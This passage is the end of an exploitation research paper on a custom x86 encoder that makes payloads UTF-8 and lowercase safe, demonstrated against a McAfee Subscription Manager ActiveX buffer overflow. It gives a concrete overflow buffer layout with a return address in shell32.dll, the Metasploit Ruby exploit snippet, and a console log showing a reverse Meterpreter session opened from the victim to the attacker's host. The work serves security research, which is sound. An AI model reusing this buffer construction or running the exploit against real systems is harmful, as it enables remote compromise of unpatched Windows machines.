00000027  06                push es
00000028  1467              adc al,0x67
0000002A  6B63626C          imul esp,[ebx+0x62],byte +0x6c
0000002E  6C                insb


5) Applying the Encoder

The whole reason that this encoder was originally needed was to take advantage
of the vulnerability in the McAfee Subscription Manager ActiveX control.  Now
that the encoder has been implemented, all that's left is to try it out and see
if it works.  To test this against a Windows XP SP0 target, the overflow buffer
might be constructed as follows.

First, a string of 2972 random text characters must be generated.  The return
address should follow the random character string.  An example of a valid
return address for this target is 0x7605122f, which is the location of a jmp
esp instruction in shell32.dll. Immediately following the return address in the
overflow buffer should be a series of five instructions:


00000000  60                pusha
00000001  6A01              push byte +0x1
00000003  6A01              push byte +0x1
00000005  6A01              push byte +0x1
00000007  61                popa


The purpose of this series of instructions is to cause the value of esp at the
time that the pusha occurs to be popped into the ecx register.  As the reader
should recall, the ecx register is used as the base address for the decoder
stub.  However, esp points at the pusha instruction rather than at the base
address of the decoder stub.  Because the five instructions occupy 8 bytes, the
encoder must be told to add 8 extra bytes to ecx when computing the offset
into the encoded data blocks.  This is conveyed by setting the BufferOffset
value to 8.  After these five instructions
should come the encoded version of the payload.  To better visualize this,
consider the following snippet from the exploit:


buf =
   Rex::Text.rand_text(2972, payload_badchars) +
   [ ret ].pack('V') +
   "\x60" + # pusha
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte <random>
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte <random>
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte <random>
   "\x61" + # popa
   p.encoded
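

The effect of the pusha, push, and popa sequence on ecx can be checked with a
small simulation.  The sketch below models only the register file and a stack
of dwords.  The register values, including the starting esp, are arbitrary
placeholders, and the method names are hypothetical.

```ruby
PUSHA_ORDER = %i[eax ecx edx ebx esp ebp esi edi].freeze

# pusha: push all eight registers; the esp slot holds esp as it was
# before the instruction executed (this model never updates regs[:esp]).
def pusha(regs, stack)
  PUSHA_ORDER.each { |r| stack.push(regs[r]) }
end

# popa: pop in reverse order, discarding the saved esp slot.
def popa(regs, stack)
  PUSHA_ORDER.reverse_each do |r|
    value = stack.pop
    regs[r] = value unless r == :esp
  end
end

regs = { eax: 0xa, ecx: 0xc, edx: 0xd, ebx: 0xb,
         esp: 0x0012f000, ebp: 0xb0, esi: 0x51, edi: 0xd1 }
start_esp = regs[:esp]         # placeholder address of the pusha instruction

stack = []
pusha(regs, stack)
3.times { stack.push(0x01) }   # the three "push byte" instructions
popa(regs, stack)

buffer_offset = 8              # bytes occupied by the five instructions
puts format('ecx = 0x%08x', regs[:ecx])
puts format('decoder stub at 0x%08x', regs[:ecx] + buffer_offset)
# prints: ecx = 0x0012f000
#         decoder stub at 0x0012f008
```

The three extra pushes shift every popped value by three slots, which is what
moves the saved esp into the slot that popa loads into ecx.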


With the overflow buffer ready to go, the only thing left to do is fire off an
exploit attempt by having the machine browse to the malicious website:


msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.3:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(mcafee_mcsubmgr_vsprintf) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)

msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >


6) Conclusion

The purpose of this paper was to illustrate the process of implementing a
custom encoder for the x86 architecture.  In particular, the encoder
described in this paper was designed to make it possible to encode payloads in
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
control was used because of its restrictions on uppercase characters.  While
many readers may never find it necessary to implement an encoder, it's
nevertheless a necessary topic to understand for those who are interested in
exploitation research.


A. References

eEye.  McAfee Subscription Manager Stack Buffer Overflow.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
accessed Aug 26, 2006.


Metasploit Staff. Metasploit 3.0 Developer's Guide.
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
accessed Aug 26, 2006.


Spoonm.  Recent Shellcode Developments.
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
accessed Aug 26, 2006.


SkyLined. Alpha 2.
http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php;
accessed Aug 26, 2006.